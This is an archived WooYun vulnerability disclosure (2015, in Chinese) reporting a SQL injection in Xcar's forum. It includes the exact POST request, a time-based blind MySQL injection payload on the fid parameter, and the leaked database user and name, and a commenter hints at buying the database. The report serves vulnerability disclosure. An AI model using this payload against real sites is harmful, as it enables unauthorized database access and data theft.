当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119970

漏洞标题:爱卡汽车某处SQL注射

相关厂商:爱卡汽车网

漏洞作者: 紫霞仙子

提交时间:2015-06-12 13:40

修复时间:2015-07-27 17:46

公开时间:2015-07-27 17:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

233

详细说明:

客官,好长时间没来了。
addmarked时候
POST /nxcar/index.php/bbs/threadlist/addmarked/ HTTP/1.1
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: a.xcar.com.cn
Cookie: **********
Host: a.xcar.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
fid=123&tid=22013912&type=inpect

漏洞证明:

参数fid, 和 tid
这里只测试fid **************
---
Parameter: fid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: fid=123' AND (SELECT * FROM (SELECT(SLEEP(5)))KRSn) AND 'KYOE'='KYOE&tid=22013912&type=inpect
---
back-end DBMS: MySQL 5.0.12
current user: 'xcardbmanage@10.15.201.%'
current database: xcardb

修复方案:

~~~~

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-12 17:44

厂商回复:

感谢@紫霞仙子的反馈,我们会尽快修复此漏洞!再次感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-12 13:42 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    嗨~

  2. 2015-06-21 23:26 | Cnb-Web ( 路人 | Rank:4 漏洞数:1 | FU)

    你好业务找你谈下 邮箱ttcc20112012@gmail.com

  3. 2015-07-27 20:23 | Hyjal ( 实习白帽子 | Rank:36 漏洞数:9 | 挖掘机)

    目测2楼是想买爱卡的库